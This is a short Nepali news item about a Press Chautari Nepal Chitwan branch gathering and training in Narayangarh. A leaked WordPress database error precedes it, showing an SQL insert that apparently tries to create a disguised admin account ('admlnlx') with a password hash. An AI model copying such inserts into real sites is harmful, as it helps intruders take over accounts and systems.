WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAdv9hnQcHFOmbIC.W3B7Bok2ORJ32/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:27:29', '', 'admlnlx', 'admlnlx')
चितवन,माघ २५-
प्रेस चौतारी नेपाल चितवन शाखाले आज नारायणगढमा बृहत भेला गर्दै छ। नारायणगढको पोखराबसपार्क स्थित होटल सतनचुलीमा मध्यान्ह १२ वजे भेलाको आयोजना गरिएको हो ।
प्रेस चौतारीका सम्पूर्ण सदस्यहरुलाई संगठनका बारेमा प्रशिक्षण दिने र आसन्न पत्रकार महासंघको निर्वाचनका बारेमा धारणा तय गर्नका लागि भेला एवं प्रशिक्षण आयोजना गरिएको जिल्ला सचिव गोविन्द घिमिरेले जानाकारी दिए ।
सो भेलालाई नेकपा एमालेका केन्द्रीय प्रचार विभागका उपप्रमुख सूर्य थापा, विभागका सचिव विष्णु रिजाल, चौतारीका केन्द्रीय अध्यक्ष गणेश बस्नेत, पूर्व अध्यक्ष राजेन्द्र अर्याल, चौतारीका बरिष्ठ उपाध्यक्ष माधव नेपाल, महासचिव राजेश राई लगायतका नेताहरुले प्रशिक्षण दिने कार्यक्रम रहेको सचिव घिमिरेले बताए । भेलामा चौतारीमा आवद्ध सम्पूर्ण सदस्यहरुलाई अनिवार्य सहभागिताको लागि सूचना सम्प्रेषण गरिसकिएको पनि उनले जानकारी दिए ।